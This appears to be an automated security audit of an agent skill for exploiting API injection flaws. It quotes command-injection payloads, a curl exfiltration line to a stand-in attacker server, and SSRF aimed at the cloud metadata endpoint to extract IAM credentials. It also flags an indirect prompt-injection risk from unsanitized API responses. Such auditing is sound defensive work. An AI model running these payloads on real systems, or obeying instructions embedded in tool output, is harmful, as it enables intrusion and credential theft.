skills/mukul975/anthropic-cybersecurity-skills/exploiting-api-injection-vulnerabilities/Gen Agent Trust Hub
exploiting-api-injection-vulnerabilities
Warn
Audited by Gen Agent Trust Hub on Mar 15, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides functional OS command injection payloads in both the workflow documentation and the automation script. Examples found in
SKILL.mdandscripts/agent.pyinclude; id,| whoami, and; cat /etc/passwd, which are used to execute arbitrary system commands on targets. - [DATA_EXFILTRATION]: The skill includes instructions and payloads for exfiltrating sensitive data to external infrastructure.
SKILL.mdprovides a payload; curl http://attacker-controlled-server.com/$(whoami)for transmitting host identifiers. Additionally, it contains SSRF payloads specifically targeting cloud metadata endpoints at169.254.169.254to extract IAM credentials and instance configuration. - [PROMPT_INJECTION]: The skill has an attack surface for indirect prompt injection. The script
scripts/agent.pyingests untrusted text from API responses viaresp.textwithout using boundary markers or sanitization. This allows an attacker-controlled API to potentially influence the agent's behavior by embedding instructions in the response body.
Audit Metadata